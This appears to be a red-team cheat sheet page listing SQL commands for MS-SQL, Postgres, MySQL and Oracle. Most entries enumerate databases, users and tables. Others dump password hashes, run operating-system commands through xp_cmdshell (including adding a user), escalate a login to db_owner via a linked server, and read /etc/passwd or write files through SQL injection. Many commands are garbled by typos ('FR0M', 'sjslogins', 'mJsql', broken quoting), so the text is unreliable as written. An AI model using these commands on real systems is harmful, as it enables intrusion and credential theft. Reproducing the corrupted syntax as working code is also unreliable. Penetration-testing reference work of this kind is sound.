Blue Team GuidesRed Team RecipeDevSecOps Guides

Databases

Database

Ms-sql

Command

Description

SELECT @@version

Database version

EXEC xp_msver

version details

EXEC master..xp_cmdshell 'net user'

Run operating system command

SELECT HOST_NAME()

Get Hostname and IP

SELECT DB_NAME()

Current database

SELECT name FROM master..sysdatabases;

List of databases

SELECT user name()

Current user

SELECT name FROM master .. sjslogins

List of users

SELECT name FROM master..sysobjects WHERE xtype= 'U';

list of tables

SELECT name FROM syscolumns WHERE id=(SELECT id FR0M sysobjects WHERE name- 'mjtable' ) ;

List of columns

Information about all database tables in the system table

SELECT TOP 1 TABLE_NAME FROM INFORMATION SCHEMA.TABLES

List of tables and columns

SELECT name FROM Syscolumns WHERE id
(SELECT id FROM Sysobjects WHERE
name='mytable')

Password hash

SELECT name, password hash FROM master.sys.sgl_logins

Bypass user access level

execute('execute(''alter role [db_owner] add member [client]'') at "compatibility\poo_public"')

Postgres

Command

Explanation

SELECT version();

Database version

SELECT inet server_addr()

Get Hostname and IP

SELECT current database();

Current database

SELECT datname FROM pg database;

List of databases

SELECT user;

Current user

SELECT username FROM pg_user;

List of users

SELECT username,passwd FROM pg shadow

List of password hashes

column list

SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttjpid=T.oid) AND (A.attnum 0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE 'public')

List of tables

SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN
pg catalog.pg namespace n ON n.oid = c.relnamespace WHERE c.relkind IN
( 'r',") AND n.nspname NOT IN ( 'pg catalog', 'pg toast') AND
pg_catalog.pg_table_is_visible(c.oid)

Mysql

Command

Explanation

SELECT @@version;

Database version

SELECT @@hostname;

Get Hostname and IP

SELECT database();

Current database

SELECT distinct (db) FROM mysql.db;

List of databases

SELECT user();

Current user

SELECT user FROM mysql.user;

List of users

SELECT host,user,password FROM mJsql.user;

Password hash list

List of all tables and columns

SELECT table schema, table name, column_name FR0M
information scherna.columns WHERE
table schema != 'mysql' AND table schema != 'information schema'

Execution of operating system command in mysql

osql -S ip , port -U sa -P pwd -Q "exec xp cmdshell `net user /add user
passr

Reading readable files in mysql

UNION ALL SELECT LOAD FILE( '/etc/passwd');

Writing to the file system in mysql

SELECT * FROM mytable INTO dumpfile '/tmp/somefile';

Oracle

Command

Explanation

SELECT * FROM v$version;

Database version

SELECT version FROM v$instance;

Database version

SELECT instance name FROM v$instance;

Current database

SELECT name FROM v$database;

Current database

SELECT DISTINCT owner FROM all_tables;

List of databases

SELECT user FROM dual;

Current user

SELECT username FROM all_users ORDER BY username;

List of users

SELECT column name FROM all_tab_columns;

List of columns

SELECT table name FROM all_tables;

list of tables

SELECT name, password, astatus FROM sys.user$;

List of password hashes

List of databases

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';

PreviousWebNextProgramming

Last updated